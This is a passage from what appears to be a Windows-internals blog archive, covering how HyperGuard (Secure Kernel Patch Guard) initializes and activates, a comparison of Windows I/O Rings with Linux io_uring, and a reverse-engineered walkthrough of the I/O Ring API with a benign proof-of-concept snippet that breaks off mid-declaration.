If HotPatching is enabled, one last secure module extent gets created for each secure module. The variable SkmiHotPatchAddressReservePages will indicate how many pages are reserved for HotPatch use at the end of the module, and an extent gets created for each of those pages. Similar to the way described earlier for normal kernel module extents, each extent describes a single page, the extent type is SkpgExtentPartialMemory and the type SkpgExtentSecureModule is placed in one of the type-specific fields of the extent.

Another secure extent type is SkpgExtentSecureMemory. This is a generic extent type used to indicate any memory range in the secure kernel. However, for now it is only used to monitor the GDT pointed to by the secure kernel processor block – the SKPRCB. This is an internal structure that is similar in its purpose to the normal kernel’s KPRCB (and similarly, an array of them exists in SkeProcessorBlock). There will be one extent of this type for each processor in the system. Additionally, the function sets a bit in the Type field of each KGDTENTRY64 structure to indicate that this entry has been accessed and prevent it from being modified later on – but the entry for the TSS at offset 0x40 gets skipped:

This pretty much covers the initialization and uses of the memory extents. But this is just the first group of extents, and there are many others that monitor various different parts of the system. In the next post I’ll talk about more of these other extent types, which interact with system components like MSRs, control registers, the KCFG bitmap and more!

HyperGuard – Secure Kernel Patch Guard: Part 1 – SKPG Initialization

This will be a multi-part series of posts describing the internal mechanisms and purpose of Secure Kernel Patch Guard, also known as HyperGuard. This first part will focus on what SKPG is and how it’s being initialized.

Overview

In the world of Windows security, PatchGuard is uniquely undocumented, and there is hardly any “unofficial” documentation either. Thus, there are conflicting opinions and rumors about the way it operates, and the different “PatchGuard bypasses” that get published aren’t very reliable. Still, every few years some helpful PG analysis gets published, shedding some light on this mysterious feature. This blog post is not about PatchGuard so we won’t go into much detail about it, but it discusses a similar and related feature, so some basic knowledge of PatchGuard is needed. Here are a couple of things needed to understand the rest of the post:

  • The purpose of PatchGuard is to monitor the system for changes in kernel space that should not happen on a normal system and crash it when those are detected. This doesn’t mean any unusual data change – PatchGuard monitors a pre-determined list of data structures that are common targets for kernel exploitation or rootkits, such as modifications to HalDispatchTable or callback arrays, or changes to control registers or MSRs to disable security features. The full list of monitored structures and pointers is not documented and the information that does get published by Microsoft is left vague on purpose.
  • PatchGuard doesn’t monitor everything, all the time. It runs periodically, checking for certain changes every time it runs – it won’t necessarily crash the system right when a malicious change is done and a system might run for a long time with such changes. There is no guarantee that PatchGuard will ever detect and crash the system. This also means it is hard to validate potential bypasses.

The main weakness of PatchGuard and the reason for all the obscurity around its implementation is the fact that it monitors Ring 0 code and data – from code that runs in Ring 0. There is nothing preventing a rootkit that already gained Ring 0 code execution privileges from patching the code for PatchGuard itself and disabling or bypassing it. The only thing stopping this scenario is PatchGuard’s obscurity and the fact that its code is hard to find and uses a range of obfuscation techniques to make itself hard to analyze and disable.

There is a lot more to say about PatchGuard but, like I mentioned, this is not the topic of the post. So, I’ll skip right to discussing PatchGuard’s newer sibling – HyperGuard, also known as Secure Kernel Patch Guard, or SKPG. This new feature leverages the existence of Hyper-V and VBS to create a new monitoring and protection capability that is similar to PatchGuard but not susceptible to the same weaknesses, since it is not running as normal Ring 0 code and cannot be tampered with by normal rootkits.

Finding HyperGuard

HyperGuard takes advantage of VBS – Virtualization Based Security. This capability that was added in the past few years is made possible by the creation of Hyper-V and Virtual Trust Levels (VTLs). The hypervisor allows creating a system where most things run in VTL0, but some, more privileged things, run in higher VTLs (currently the only one implemented is VTL1) where they are not accessible to normal processes regardless of their privilege level – including VTL0 kernel code. Put simply, no VTL0 code can interact with memory in VTL1 in any way.

Having memory that cannot be tampered with even from normal kernel code allows for many new security features, some of which I’ve written about in the past and others are documented in other blogs, conference talks and official Microsoft documentation. A few examples include KCFG, HVCI and KDP.

This is also what allows Microsoft to implement HyperGuard – a feature similar to PatchGuard that can’t be tampered with even by malicious code that managed to elevate itself to run in the kernel. For this reason, HyperGuard doesn’t need to hide or obfuscate itself in any way, making it much easier to analyze using static analysis tools.

The VTL1 kernel, also known as the secure kernel, is managed through SecureKernel.exe. This is also the binary where HyperGuard is implemented. If we open securekernel.exe in IDA we can easily find all the code implementing HyperGuard, which all uses the prefix Skpg:

This series will cover some of those functions, starting with the first one called during boot: SkpgInitSystem:

HyperGuard Initialization

HyperGuard initialization mostly happens during the normal kernel’s Phase 1 initialization, but requires multiple steps. The first step starts with a secure call where SKSERVICE=SECURESERVICE_PHASE3_INIT. This leads to SkInitSystem which will initialize SKCI (Secure Kernel Code Integrity) and call into SkpgInitSystem. This function sets up the basic components of SKPG – its callback, timer, extension table and intercept functions, all of which I’ll discuss in more detail later in this series. At this point SKPG is not fully initialized – that only happens later in response to another request from the normal kernel. For now, only a few SKPG globals are being set:

Some interesting components to notice at this stage are:

  • SkpgPatchGuardCallback – a callback which is going to be called every time HyperGuard checks need to run and will invoke the target function SkpgPatchGuardCallbackRoutine.
  • SkpgPatchGuardTimer – a secure kernel timer object that is going to control the execution of some HyperGuard checks. It gets set to run at a random time so checks will happen at different intervals, making periodic checks harder to avoid. The function sets its callback to SkpgPatchGuardTimerRoutine.
  • Intercept function pointers – other than the periodic checks controlled by the timer, HyperGuard also has a few intercept functions, which execute every time a certain operation is being intercepted by the Hypervisor. The operation being intercepted is pretty clear from the function names, but I’ll cover them in more detail later anyway. The global variables for these are:
    • ShvlpHandleMsrIntercept – points to SkpgxInterceptMsr
    • ShvlpHandleRegisterIntercept – points to SkpgxInterceptRegister
    • ShvlpHandleRepHypercallIntercept – points to SkpgInterceptRepHypercall
  • Optional variables – there are a few other global variables that did not fit in the screenshot and get initialized based on the flags received as part of the input argument, or other optional configuration:
    • SkpgInhibitKernelVaProtection
    • SkpgNtKvaShadow
    • SkpgSecureExtension

After initializing all the global variables, the function returns and the rest of the secure kernel initialization continues. For now, the timer is not scheduled and HyperGuard is effectively “dormant”. HyperGuard is only fully “activated” later – through a call to SkpgConnect.

There are three ways to call SkpgConnect and all start from a call by the normal kernel:

HyperGuard Activation

Connect Software Interrupt – the PatchGuard Path

The most interesting HyperGuard activation path is through PatchGuard. This SKPG activation path, like all others, begins with a secure call. This secure call, with SKSERVICE=SECURESERVICE_CONNECT_SW_INTERRUPT, originates from the normal kernel function VslConnectSwInterrupt. This leads, as usual, to the secure kernel handler which calls into IumpConnectSwInterrupt and from there to SkpgConnect, passing it all the data that was sent by the normal kernel.

When we search for calls to VslConnectSwInterrupt we see two calls – one from PsNotifyCoreDriversInitialized that I’ll cover soon and a second one from KiConnectSwInterrupt:

KiConnectSwInterrupt is only called by one caller – an anonymous function in ntoskrnl.exe that has no name in the public symbols. This is an extremely large function that calls into other anonymous functions and has a lot of weird and seemingly unrelated functionality. This is one of the PatchGuard initialization routines, which does the “real” activation of HyperGuard, supplying the secure kernel with memory protection ranges and targets which I will discuss later when talking about SKPG extents.

I encourage you to follow the call stack yourselves and get a bit of insight into the mysteries of PatchGuard initialization, but if I start covering PatchGuard details this series will quickly become a book so I will skip the details here. Let’s just trust me when I say that this all also happens in the context of Phase 1 initialization and is the first point where HyperGuard is activated.

Once HyperGuard is fully activated, a global variable SkpgInitialized is set to TRUE. This variable is checked every time SkpgConnect is called, and if set the function will return immediately and not make any changes to any SKPG initialization data. This means that the two other activation paths that will be described here will only activate HyperGuard if PatchGuard is not running and will result in less thorough protection of the machine. If PatchGuard is active, then the other two activation paths will return without doing anything.

Connect Software Interrupt – Phase1 Initialization

The second code path into VslConnectSwInterrupt goes through PsNotifyCoreDriversInitialized. This is also happening as part of Phase 1 initialization, but later than the PatchGuard path:

As we can see here, the call to VslConnectSwInterrupt is done with empty input variables, meaning no memory ranges or extra data is sent to HyperGuard and it will only use its basic functionality. If PatchGuard is running, then at this point SKPG should already be initialized and the call will return with no changes to SKPG, so this path is only needed if PatchGuard is not active.

Phase3 Initialization

The last case where HyperGuard is activated happens during Phase 3 initialization. This happens in response to a secure call with SKSERVICE=SECURESERVICE_REGISTER_SYSTEM_DLLS. It will also call into SkpgConnect with no input data, simply to initialize it if nothing else has already.

On the normal kernel side: In PspInitPhase3 the system checks the VslVsmEnabled global variable to learn whether Hyper-V is running and VSM is enabled. If it is, the system calls VslpEnterIumSecureMode – a common function to generate a secure call with a given service code and arguments packed into an MDL. The system enters secure mode with service code SECURESERVICE_REGISTER_SYSTEM_DLLS:

Once a secure call reaches the secure kernel it is handled by IumInvokeSecureService, which is pretty much just a big switch statement, calling the correct function or functions for each service code. In the case of code SECURESERVICE_REGISTER_SYSTEM_DLLS, it calls SkpgConnect and then uses the data passed in by the kernel to register system DLLs:

As I mentioned, this is the last time SkpgConnect is called, right at the end of system initialization. This is done in case SKPG hasn’t been initialized at an earlier stage already. In this case, SkpgConnect is called with almost no input data, to only initialize the most basic SKPG functionality. If SKPG has already been initialized earlier, this call will return without changing anything.

HyperGuard Activation – Diagram

This is it for part 1 of this series. So far, we only covered the general idea of what HyperGuard is and its initialization paths. Next time we will dive into SkpgConnect to see what happens during SKPG activation and learn more about the types of data SKPG protects and how.

IoRing vs. io_uring: a comparison of Windows and Linux implementations

A few months ago I wrote this post about the introduction of I/O Rings in Windows. After publishing it a few people asked for a comparison of the Windows I/O Ring and the Linux io_uring, so I decided to do just that. The short answer – the Windows implementation is almost identical to the Linux one, especially when using the wrapper functions provided by helper libraries. The long answer is what I’ll be covering in the rest of this post.
The information about the io_uring implementation was gathered mostly from here – a paper documenting the internal implementation and usage of io_uring on Linux and explaining some of the reasons for its existence and the way it was built.
As I said, the basic implementation of both mechanisms is very similar – both are built around a submission queue and a completion queue that have shared views in both user and kernel address spaces. The application writes the requested operation data into the submission queue and submits it to the kernel, which processes the requested number of entries and writes the results into the completion queue. In both cases there is a maximum number of allowed entries per ring, and the completion queue can have up to twice the number of entries of the submission queue. However, there are some differences in the internal structures as well as the way the application is expected to interact with the I/O ring.

Initialization and Memory Mapping

One such difference is the initialization stage and mapping of the queues into user space: on Windows the kernel fully initializes the new ring, including the creation of both queues and creating a shared view in the application’s user-mode address space, using an MDL. However, in the Linux io_uring implementation, the system creates the requested ring and the queues but does not map them into user space. The application is expected to call mmap(2) using the appropriate file descriptors to map both queues into its address space, as well as the SQE array, which is separate from the main queue.
This is another difference worth noticing – on Linux the completion ring (or queue) directly contains the array of CQEs, but the submission ring does not. Instead, the sqes field in the submission ring is a pointer to another memory region containing the array of SQEs, that has to be mapped separately. To index this array, the sqring has an additional array field which contains the index into the SQEs array. Not being a Linux expert, I won’t try to explain the reasoning behind this design and will simply quote the reasoning given in the paper mentioned above:

This might initially seem odd and confusing, but there’s some reasoning behind it. Some applications may embed request units inside internal data structures, and this allows them the flexibility to do so while retaining the ability to submit multiple sqes in one operation. That in turns allows for easier conversion of said applications to the io_uring interface.

On Windows there are only two important regions since the SQEs are part of the submission ring. In fact both rings are allocated by the system in the same memory region so there is only one shared view between the user and kernel space, containing two separate rings.
One more difference exists when creating a new I/O ring: on Linux the number of entries in a submission ring can be between 1 and 0x1000 (4096) while on Windows it can be between 1 and 0x10000, but at least 8 entries will always be allocated. In both cases the completion queue will have twice the number of entries as the submission queue. There is one small difference regarding the exact number of entries requested for the ring: For technical reasons the number of entries in both rings has to be a power of two. On Windows, the system takes the requested ring size and aligns it to the nearest power of two to receive the actual size that will be used to allocate the ring memory. On Linux the system does not do that, and the application is expected to request a size that is a power of two.
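As a quick sketch of the Windows behavior (assuming the alignment rounds the requested size up, which the minimum of 8 entries suggests):

//
// Round a requested entry count up to a power of two, with a minimum of 8
// entries, mirroring the behavior described above.
//
unsigned int
RoundUpRingSize (unsigned int requestedEntries)
{
    unsigned int size = 8;
    while (size < requestedEntries)
    {
        size <<= 1;
    }
    return size;
}

So a request for 10 submission entries would end up with a 16-entry submission queue, and a 32-entry completion queue.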

Versioning

Windows puts far more focus on compatibility than Linux does, putting a lot of effort into making sure that when a new feature ships, applications using it will be able to work properly across different Windows builds even as the feature changes. For that reason, Windows implements versioning for its structures and features and Linux does not. Windows also implements I/O rings in phases, marked by those versions, where the first versions only implemented read operations, the next version will implement write and flush operations, and so on. When creating an I/O ring the caller needs to pass in a version to indicate which version of I/O rings it wants to use.
On Linux, however, the feature was implemented fully from the beginning and does not require versioning. Also, Linux doesn’t put as much focus on compatibility and users of io_uring are expected to use and support the latest features.

Waiting for Operation Completion

On both Windows and Linux the caller can choose to not wait on the completion of events in the I/O ring and simply get notified when all operations are complete, making this feature fully asynchronous. In both systems the caller can also choose to wait on all events in a fully synchronous way, specifying a timeout in case processing the events takes too long. Everything in between is the area where the systems differ.
On Linux, a caller can request a wait on the completion of a specific number of operations in the ring, a capability Windows doesn’t offer. This allows applications to start processing the results after a certain number of operations have completed, instead of waiting for all of them. In newer builds Windows did add a similar yet slightly more limited option – registering a notification event that will be set when the first entry in the ring gets completed, to signal to the waiting application that it’s safe to start processing the results now.

Helper Libraries

In both systems it is possible for an application to manage its rings itself through system calls. This is an option that’s accepted on Linux and highly discouraged on Windows, where the NT API is undocumented and officially should not be used by non-Microsoft code. However, in both systems most applications have no need to manage the rings themselves, and a lot of the generic ring management code can be abstracted and managed by a separate component. This is done through helper libraries – KernelBase.dll on Windows and liburing on Linux.
Both libraries export generic functionality like creating, initializing and deleting an I/O ring, creating submission queue entries, submitting a ring and getting a result from the completion queue.
Both libraries use very similar functions and data structures, making the task of porting code from one platform to the other much easier.

Conclusion

The implementation of I/O rings on Windows is so similar to the Linux io_uring that it looks like some headers were almost copied from the io_uring implementation. There are some differences between the two features, mostly due to philosophical differences between the two systems and the role and responsibilities they give the user. The Linux io_uring was added a couple of years ago, making it a more mature feature than the new Windows implementation, though still a relatively young one and not without issues. It will be interesting to see where these two features will go in the future and what parity will exist in them in a few years.

I/O Rings – When One I/O Operation is Not Enough

Introduction

I usually write about security features or techniques on Windows. But today’s blog is not directly related to any security topics, other than the usual added risk that any new system call introduces. However, it’s an interesting addition to the I/O world in Windows that could be useful for developers and I thought it would be interesting to look into and write about. All this is to say – if you’re looking for a new exploit or EDR bypass technique, you should save yourselves the time and look at the other posts on this website instead.

For the three of you who are still reading, let’s talk about I/O rings!

I/O ring is a new feature on Windows preview builds. This is the Windows implementation of a ring buffer – a circular buffer, in this case used to queue multiple I/O operations simultaneously, to allow user-mode applications performing a lot of I/O operations to do so in one action instead of transitioning from user to kernel and back for every individual request.

This new feature adds a lot of new functions and internal data structures, so to avoid constantly breaking the flow of the blog with new data structures I will not put them as part of the post, but their definitions exist in the code sample at the end. I will only show a few internal data structures that aren’t used in the code sample.

I/O Ring Usage

The current implementation of I/O rings only supports read operations and allows queuing up to 0x10000 operations at a time. For every operation the caller will need to supply a handle to the target file, an output buffer, an offset into the file and amount of memory to be read. This is all done in multiple new data structures that will be discussed later. But first, the caller needs to initialize its I/O ring.

Create and Initialize an I/O Ring

To do that, the system supplies a new system call – NtCreateIoRing. This function creates an instance of a new IoRing object type, described here as IORING_OBJECT:

typedef struct _IORING_OBJECT
{
  USHORT Type;
  USHORT Size;
  NT_IORING_INFO Info;
  PSECTION SectionObject;
  PVOID KernelMappedBase;
  PMDL Mdl;
  PVOID MdlMappedBase;
  ULONG_PTR ViewSize;
  ULONG SubmitInProgress;
  PVOID IoRingEntryLock;
  PVOID EntriesCompleted;
  PVOID EntriesSubmitted;
  KEVENT RingEvent;
  PVOID EntriesPending;
  ULONG BuffersRegistered;
  PIORING_BUFFER_INFO BufferArray;
  ULONG FilesRegistered;
  PHANDLE FileHandleArray;
} IORING_OBJECT, *PIORING_OBJECT;

NtCreateIoRing receives one new structure as an input argument – IO_RING_STRUCTV1. This structure contains the requested version (which currently can only be 1), required and advisory flags (neither currently supports any values other than 0) and the requested sizes for the submission queue and completion queue.

The function receives this information and does the following things:

  1. Validates all the input and output arguments – their addresses, size alignment, etc.
  2. Checks the requested submission queue size and calculates the amount of memory needed for the submission queue based on the requested number of entries.
    1. If SubmissionQueueSize is over 0x10000 a new error status STATUS_IORING_SUBMISSION_QUEUE_TOO_BIG gets returned.
  3. Checks the completion queue size and calculates the amount of memory needed for it.
    1. The completion queue is limited to 0x20000 entries and error code STATUS_IORING_COMPLETION_QUEUE_TOO_BIG is returned if a larger number is requested.
  4. Creates a new object of type IoRingObjectType and initializes all fields that can be initialized at this point – flags, submission queue size and mask, event, etc.
  5. Creates a section for the queues, maps it in system space and creates an MDL to back it. Then maps the same section in user-space. This section will contain the submission space and completion space and will be used by the application to communicate the parameters for all requested I/O operations with the kernel and receive the status codes.
  6. Initializes the output structure with the submission queue address and other data to be returned to the caller.

After NtCreateIoRing returns successfully, the caller can write its data into the supplied submission queue. The queue will have a queue head, followed by an array of NT_IORING_SQE structures, each representing one requested I/O operation. The header describes which entries should be processed at this time:

The queue header describes which entries should be processed using the Head and Tail fields. Head specifies the index of the last unprocessed entry, and Tail specifies the index to stop processing at. Tail - Head has to be lower than the total number of entries, as well as equal to or higher than the number of entries that will be requested in the call to NtSubmitIoRing.
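In practice that means the application writes an entry into the next free slot and bumps Tail past it. A hedged sketch, using the reverse engineered NT_IORING_INFO, IORING_QUEUE_HEAD and NT_IORING_SQE structures from the code sample at the end of this post:

//
// Return a pointer to the next free submission queue entry and advance Tail,
// so Tail - Head covers the newly written entry. The mask wraps the index
// around the ring.
//
PNT_IORING_SQE
GetNextSqe (
    _In_ PNT_IORING_INFO Info
    )
{
    PIORING_QUEUE_HEAD head = Info->SubQueueBase;
    PNT_IORING_SQE sqes = (PNT_IORING_SQE)((ULONG64)head + sizeof(IORING_QUEUE_HEAD));
    ULONG index = head->Tail & Info->SubQueueSizeMask;

    head->Tail++;
    return &sqes[index];    // the caller fills in this entry
}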

Each queue entry contains data about the requested operation: file handle, file offset, output buffer base, offset and amount of data to be read.  It also contains an OpCode field to specify the requested operation.

I/O Ring Operation Codes

There are four possible operation types that can be requested by the caller:

  1. IORING_OP_READ: requests that the system reads data from a file into an output buffer. The file handle will be read from the FileRef field in the submission queue entry. This will either be interpreted as a file handle or as an index into a pre-registered array of file handles, depending on whether the IORING_SQE_PREREGISTERED_FILE flag (1) is set in the queue entry Flags field. The output will be written into an output buffer supplied in the Buffer field of the entry. Similar to FileRef, this field can instead contain an index into a pre-registered array of output buffers if the IORING_SQE_PREREGISTERED_BUFFER flag (2) is set.
  2. IORING_OP_REGISTERED_FILES: requests pre-registration of file handles to be processed later. In this case the Buffer field of the queue entry points to an array of file handles. The requested file handles will get duplicated and placed in a new array, in the FileHandleArray field of the IoRing object. The FilesRegistered field will contain the number of file handles.
  3. IORING_OP_REGISTERED_BUFFERS: requests pre-registration of output buffers for file data to be read into. In this case, the Buffer field in the entry should contain an array of IORING_BUFFER_INFO structures, describing addresses and sizes of buffers into which file data will be read:

    typedef struct _IORING_BUFFER_INFO
    {
        PVOID Address;
        ULONG Length;
    } IORING_BUFFER_INFO, *PIORING_BUFFER_INFO;

    The buffers’ addresses and sizes will be copied into a new array and placed in the BufferArray field of the IoRing object. The BuffersRegistered field will contain the number of buffers.

  4. IORING_OP_CANCEL: requests the cancellation of a pending operation for a file. Just like in IORING_OP_READ, the FileRef can be a handle or an index into the file handle array depending on the flags. In this case the Buffer field points to the IO_STATUS_BLOCK to be canceled for the file.

All these options can be a bit confusing so here are illustrations for the 4 different reading scenarios, based on the requested flags:

Flags are 0, using the FileRef field as a file handle and the Buffer field as a pointer to the output buffer:

Flag IORING_SQE_PREREGISTERED_FILE (1) is requested, so FileRef is treated as an index into an array of pre-registered file handles and Buffer is a pointer to the output buffer:

Flag IORING_SQE_PREREGISTERED_BUFFER (2) is requested, so FileRef is a handle to a file and Buffer is treated as an index into an array of pre-registered output buffers:

Both IORING_SQE_PREREGISTERED_FILE and IORING_SQE_PREREGISTERED_BUFFER flags are set, so FileRef is treated as an index into a pre-registered file handle array and Buffer is treated as index into a pre-registered buffers array:
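Put into (hypothetical) code, the kernel-side interpretation of FileRef based on those flags looks roughly like this – the flag constants use the values mentioned above, and the lookup in the IoRing object is heavily simplified:

#define IORING_SQE_PREREGISTERED_FILE   0x1
#define IORING_SQE_PREREGISTERED_BUFFER 0x2

//
// Resolve the FileRef field of a submission queue entry into a file handle.
// The Buffer field is resolved the same way, only against BufferArray and
// BuffersRegistered instead.
//
HANDLE
ResolveFileRef (
    _In_ PIORING_OBJECT IoRing,
    _In_ PNT_IORING_SQE Sqe
    )
{
    if (Sqe->Flags & IORING_SQE_PREREGISTERED_FILE)
    {
        //
        // FileRef is an index into the pre-registered file handle array
        //
        ULONG index = (ULONG)(ULONG_PTR)Sqe->FileRef;
        if (index >= IoRing->FilesRegistered)
        {
            return NULL;
        }
        return IoRing->FileHandleArray[index];
    }

    //
    // FileRef is a plain file handle
    //
    return Sqe->FileRef;
}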

Submitting and Processing I/O Ring

Once the caller has set up all its submission queue entries, it can call NtSubmitIoRing to submit its requests to the kernel to get processed according to the requested parameters. Internally, NtSubmitIoRing iterates over all the entries and calls IopProcessIoRingEntry, sending the IoRing object and the current queue entry. The entry gets processed according to the specified OpCode, and then IopIoRingDispatchComplete is called to fill in the completion queue. The completion queue, much like the submission queue, begins with a header, containing a Head and a Tail, followed by an array of entries. Each entry is an IORING_CQE structure – it has the UserData value from the submission queue entry and the Status and Information from the IO_STATUS_BLOCK for the operation:

typedef struct _IORING_CQE
{
    UINT_PTR UserData;
    HRESULT ResultCode;
    ULONG_PTR Information;
} IORING_CQE, *PIORING_CQE;

Once all requested entries are completed the system sets the event in IoRingObject->RingEvent. As long as not all entries are complete the system will wait on the event using the Timeout received from the caller and wake up when all requests are completed, causing the event to be signaled, or when the timeout expires.

Since multiple entries can be processed, the status returned to the caller will either be an error status indicating a failure to process the entries or the return value of KeWaitForSingleObject. Status codes for individual operations can be found in the completion queue – so don’t confuse receiving a STATUS_SUCCESS code from NtSubmitIoRing with successful read operations!
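To check those individual status codes, the application walks the completion queue itself. Here is a sketch that assumes the completion ring starts with the same kind of Head/Tail header as the submission ring (that assumption, and consuming entries by advancing Head, are mine; only the IORING_CQE layout above comes from the system):

//
// Walk all completion queue entries written since the last call and print
// their results, then mark them as consumed by advancing Head.
//
void
DumpCompletions (
    _In_ PNT_IORING_INFO Info
    )
{
    PIORING_QUEUE_HEAD head = (PIORING_QUEUE_HEAD)Info->CompQueueBase;
    PIORING_CQE cqes = (PIORING_CQE)((ULONG64)head + sizeof(IORING_QUEUE_HEAD));

    for (ULONG i = head->Head; i != head->Tail; i++)
    {
        PIORING_CQE cqe = &cqes[i & Info->CompQueueSizeMask];
        printf("UserData: 0x%llx Status: 0x%x Information: 0x%llx\n",
               (ULONG64)cqe->UserData,
               cqe->ResultCode,
               (ULONG64)cqe->Information);
    }
    head->Head = head->Tail;
}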

Using I/O Ring – The Official Way

Like other system calls, those new IoRing functions are not documented and not meant to be used directly. Instead, KernelBase.dll offers convenient wrapper functions that receive easy-to-use arguments and internally handle all the undocumented functions and data structures that need to be sent to the kernel. There are functions to create, query, submit and close the IoRing, as well as helper functions to build queue entries for the four different operations, which were discussed earlier.

CreateIoRing

CreateIoRing receives information about flags and queue sizes, and internally calls NtCreateIoRing and returns a handle to an IoRing instance:

HRESULT
CreateIoRing (
    _In_ IORING_VERSION IoRingVersion,
    _In_ IORING_CREATE_FLAGS Flags,
    _In_ UINT32 SubmissionQueueSize,
    _In_ UINT32 CompletionQueueSize,
    _Out_ HIORING* Handle
);

This new handle type is actually a pointer to an undocumented structure containing the structure returned from NtCreateIoRing and other data needed to manage this IoRing instance:

typedef struct _HIORING
{
    ULONG SqePending;
    ULONG SqeCount;
    HANDLE handle;
    IORING_INFO Info;
    ULONG IoRingKernelAcceptedVersion;
} HIORING, *PHIORING;

All the other IoRing functions will receive this handle as their first argument.

After creating an IoRing instance, the application needs to build queue entries for all the requested I/O operations. Since the internal structure of the queues and the queue entry structures are not documented, KernelBase.dll exports helper functions to build those using input data supplied by the caller. There are four functions for this purpose:

  1. BuildIoRingReadFile
  2. BuildIoRingRegisterBuffers
  3. BuildIoRingRegisterFileHandles
  4. BuildIoRingCancelRequest

Each function adds a new queue entry to the submission queue with the required opcode and data. Their names make their purposes pretty obvious, but let’s go over them one by one just for clarity:

BuildIoRingReadFile

HRESULT
BuildIoRingReadFile (
    _In_ HIORING IoRing,
    _In_ IORING_HANDLE_REF FileRef,
    _In_ IORING_BUFFER_REF DataRef,
    _In_ ULONG NumberOfBytesToRead,
    _In_ ULONG64 FileOffset,
    _In_ ULONG_PTR UserData,
    _In_ IORING_SQE_FLAGS Flags
);

The function receives the handle returned by CreateIoRing followed by two pointers to new data structures. Both of these structures have a Kind field, which can be either IORING_REF_RAW, indicating that the supplied value is a raw reference, or IORING_REF_REGISTERED, indicating that the value is an index into a pre-registered array. The second field is a union of a value and an index, in which the file handle or buffer will be supplied.

BuildIoRingRegisterFileHandles and BuildIoRingRegisterBuffers

HRESULT
BuildIoRingRegisterFileHandles (
    _In_ HIORING IoRing,
    _In_ ULONG Count,
    _In_ HANDLE const Handles[],
    _In_ PVOID UserData
);

HRESULT
BuildIoRingRegisterBuffers (
    _In_ HIORING IoRing,
    _In_ ULONG Count,
    _In_ IORING_BUFFER_INFO const Buffers[],
    _In_ PVOID UserData
);

These two functions create submission queue entries to pre-register file handles and output buffers. Both receive the handle returned from CreateIoRing, the count of pre-registered files/buffers in the array, an array of the handles or buffers to register and UserData.

In BuildIoRingRegisterFileHandles, Handles is a pointer to an array of file handles and in BuildIoRingRegisterBuffers, Buffers is a pointer to an array of IORING_BUFFER_INFO structures containing Buffer base and size.
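For example, pre-registering two output buffers so that later read entries can reference them by index could look something like this (a sketch – error handling is omitted, the buffer sizes are arbitrary, and the handle is assumed to come from CreateIoRing):

//
// Queue an SQE that pre-registers two output buffers. The buffers (and the
// IORING_BUFFER_INFO array describing them) have to stay valid at least
// until the ring is submitted.
//
HRESULT
RegisterTwoBuffers (
    _In_ HIORING handle
    )
{
    static IORING_BUFFER_INFO buffers[2];

    buffers[0].Address = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE);
    buffers[0].Length = 0x1000;
    buffers[1].Address = VirtualAlloc(NULL, 0x2000, MEM_COMMIT, PAGE_READWRITE);
    buffers[1].Length = 0x2000;

    return BuildIoRingRegisterBuffers(handle,
                                      ARRAYSIZE(buffers),
                                      buffers,
                                      NULL);    // UserData for the completion entry
}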

BuildIoRingCancelRequest

HRESULT
BuildIoRingCancelRequest (
    _In_ HIORING IoRing,
    _In_ IORING_HANDLE_REF File,
    _In_ PVOID OpToCancel,
    _In_ PVOID UserData
);

Just like the other functions, BuildIoRingCancelRequest receives as its first argument the handle that was returned from CreateIoRing. The second argument is an IORING_HANDLE_REF containing the handle (or index in the file handles array) of the file whose operation should be canceled. The third and fourth arguments are the operation to cancel and the UserData to be placed in the queue entry.

After all queue entries were built with those functions, the queue can be submitted:

SubmitIoRing

HRESULT
SubmitIoRing (
    _In_ HIORING IoRingHandle,
    _In_ ULONG WaitOperations,
    _In_ ULONG Milliseconds,
    _Out_ PULONG SubmittedEntries
);

The function receives the same handle as the first argument that was used to initialize the IoRing and submission queue. Then it receives the number of entries to submit, the time in milliseconds to wait on the completion of the operations, and a pointer to an output parameter that will receive the number of entries that were submitted.

GetIoRingInfo

HRESULT
GetIoRingInfo (
    _In_ HIORING IoRingHandle,
    _Out_ PIORING_INFO IoRingBasicInfo
);

This API returns information about the current state of the IoRing with a new structure:

typedef struct _IORING_INFO
{
  IORING_VERSION IoRingVersion;
  IORING_CREATE_FLAGS Flags;
  ULONG SubmissionQueueSize;
  ULONG CompletionQueueSize;
} IORING_INFO, *PIORING_INFO;

This contains the version and flags of the IoRing as well as the current size of the submission and completion queues.

Once all operations on the IoRing are done, it needs to be closed using CloseIoRing, which receives the handle as its only argument, closes the handle to the IoRing object and frees the memory used for the structure.

So far I couldn’t find anything on the system that makes use of this feature, but once 21H2 is released I’d expect to start seeing I/O-heavy Windows applications start using it, probably mostly in server and Azure environments.

Conclusion

So far, no public documentation exists for this new addition to the I/O world in Windows, but hopefully when 21H2 is released later this year we will see all of this officially documented and used by both Windows and 3rd party applications. If used wisely, this could lead to significant performance improvements for applications that have frequent read operations. Like every new feature and system call this could also have unexpected security effects. One bug was already found by hFiref0x, who was the first to publicly mention this feature and managed to crash the system by sending an incorrect parameter to NtCreateIoRing – a bug that was fixed since then. Looking more closely into these functions will likely lead to more such discoveries and interesting side effects of this new mechanism.

Code

Here’s a small PoC showing two ways to use I/O rings – either through the official KernelBase API, or through the internal ntdll API. For the code to compile properly make sure to link it against onecoreuap.lib (for the KernelBase functions) and ntdll.lib (for the ntdll functions):

#include <ntstatus.h>
#define WIN32_NO_STATUS
#include <Windows.h>
#include <cstdio>
#include <ioringapi.h>
#include <winternl.h>

typedef struct _IO_RING_STRUCTV1
{
    ULONG IoRingVersion;
    ULONG SubmissionQueueSize;
    ULONG CompletionQueueSize;
    ULONG RequiredFlags;
    ULONG AdvisoryFlags;
} IO_RING_STRUCTV1, *PIO_RING_STRUCTV1;

typedef struct _IORING_QUEUE_HEAD
{
    ULONG Head;
    ULONG Tail;
    ULONG64 Flags;
} IORING_QUEUE_HEAD, *PIORING_QUEUE_HEAD;

typedef struct _NT_IORING_INFO
{
    ULONG Version;
    IORING_CREATE_FLAGS Flags;
    ULONG SubmissionQueueSize;
    ULONG SubQueueSizeMask;
    ULONG CompletionQueueSize;
    ULONG CompQueueSizeMask;
    PIORING_QUEUE_HEAD SubQueueBase;
    PVOID CompQueueBase;
} NT_IORING_INFO, *PNT_IORING_INFO;

typedef struct _NT_IORING_SQE
{
    ULONG Opcode;
    ULONG Flags;
    HANDLE FileRef;
    LARGE_INTEGER FileOffset;
    PVOID Buffer;
    ULONG BufferSize;
    ULONG BufferOffset;
    ULONG Key;
    PVOID Unknown;
    PVOID UserData;
    PVOID stuff1;
    PVOID stuff2;
    PVOID stuff3;
    PVOID stuff4;
} NT_IORING_SQE, *PNT_IORING_SQE;

EXTERN_C_START
NTSTATUS
NtSubmitIoRing (
    _In_ HANDLE Handle,
    _In_ IORING_CREATE_REQUIRED_FLAGS Flags,
